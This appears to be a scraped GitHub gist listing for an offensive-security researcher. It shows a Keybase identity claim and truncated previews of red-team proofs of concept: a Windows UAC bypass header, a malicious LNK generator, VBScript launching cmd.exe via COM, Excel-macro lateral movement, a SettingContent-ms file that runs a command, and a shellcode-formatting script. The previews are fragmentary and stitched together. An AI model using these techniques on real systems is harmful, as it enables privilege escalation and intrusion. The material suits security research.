I hereby claim:
- I am enigma0x3 on github.
- I am enigma0x3 (https://keybase.io/enigma0x3) on keybase.
- I have a public key whose fingerprint is ACA2 EE69 66CD 2383 F8CF 98E7 BD02 7173 DFDC DF56
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
function Invoke-UACBypass { | |
<# | |
.SYNOPSIS | |
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
function Create-LNKPayload{ | |
<# | |
.SYNOPSIS | |
Generates a malicous LNK file | |
.PARAMETER LNKName | |
Name of the LNK file you want to create. |
<script language="VBScript"> | |
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") | |
obj.Document.Application.ShellExecute "cmd.exe",Null,"C:\Windows\System32",Null,0 | |
self.close | |
</script> |
function Invoke-ExcelMacroPivot{ | |
<# | |
.AUTHOR | |
Matt Nelson (@enigma0x3) | |
.SYNOPSIS | |
Pivots to a remote host by using an Excel macro and Excel's COM object | |
.PARAMETER Target | |
Remote host to pivot to | |
.PARAMETER RemoteDocumentPath | |
Local path on the remote host where the payload resides |
<?xml version="1.0" encoding="UTF-8"?> | |
<PCSettings> | |
<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent"> | |
<ApplicationInformation> | |
<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID> | |
<DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink> | |
<Icon>%windir%\system32\control.exe</Icon> | |
</ApplicationInformation> | |
<SettingIdentity> | |
<PageID></PageID> |
-------------------------------------------------------------------------------- | |
<WinProcess "smss.exe" pid 520 at 0x5db0c50L> | |
64 | |
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ff868230000 | |
-------------------------------------------------------------------------------- | |
<WinProcess "csrss.exe" pid 776 at 0x5db0908L> | |
64 | |
Interfaces : | |
Endpoints : |
import binascii | |
import sys | |
file_name = sys.argv[1] | |
with open (file_name) as f: | |
hexdata = binascii.hexlify(f.read()) | |
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
shellcode = '' | |
for i in hexlist: | |
shellcode += "0x{},".format(i) |
-------------------------------------------------------------------------------- | |
<WinProcess "smss.exe" pid 368 at 0x5306908L> | |
64 | |
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ffec24f0000 | |
-------------------------------------------------------------------------------- | |
<WinProcess "csrss.exe" pid 472 at 0x5306e48L> | |
64 | |
Interfaces : | |
Endpoints : |